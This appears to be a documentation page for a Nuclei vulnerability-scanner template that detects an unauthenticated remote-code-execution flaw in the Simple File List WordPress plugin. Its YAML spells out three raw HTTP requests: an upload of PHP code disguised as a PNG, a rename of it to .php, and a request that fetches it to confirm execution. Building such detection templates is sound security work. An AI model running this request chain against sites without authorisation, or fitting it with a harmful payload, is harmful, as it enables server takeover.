Skip to content
Nuclei Templates

WordPress SimpleFilelist - Remote Code Execution

ID: wordpress-rce-simplefilelist

Severity: critical

Author: princechaddha

Tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload

Description

Section titled “Description”

Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.

YAML Source

Section titled “YAML Source”
id: wordpress-rce-simplefilelist


info:
  name: WordPress SimpleFilelist - Remote Code Execution
  author: princechaddha
  severity: critical
  description: |
    Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
  reference:
    - https://wpscan.com/vulnerability/10192
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 3
  tags: wp,wpscan,wordpress,wp-plugin,rce,intrusive,fileupload


variables:
  filepath: '{{rand_base(7, "abcdefghi")}}'
  string: "wordpress-rce-simplefilelist"


http:
  - raw:
      - |
        POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2


        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_ID"


        1
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_FileUploadDir"


        /wp-content/uploads/simple-file-list/
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_Timestamp"


        1587258885
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="eeSFL_Token"


        ba288252629a5399759b6fde1e205bc2
        --6985fa39c0698d07f6d418b37388e1b2
        Content-Disposition: form-data; name="file"; filename="{{filepath}}.png"
        Content-Type: image/png


        <?php echo md5("{{string}}");unlink(__FILE__);?>
        --6985fa39c0698d07f6d418b37388e1b2--
      - |
        POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Content-Type: application/x-www-form-urlencoded


        eeSFL_ID=1&eeFileOld={{filepath}}.png&eeListFolder=%2F&eeFileAction=Rename%7C{{filepath}}.php
      - |
        GET /wp-content/uploads/simple-file-list/{{filepath}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a503ff7d855f8a38768a255a69ec666b9f9a5d52743647994be40e95b009b861022100b0862fcf74bc5adbd269e80ff671926e04df27a24211d6dd715bb3aac11cf498:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml"

View on Github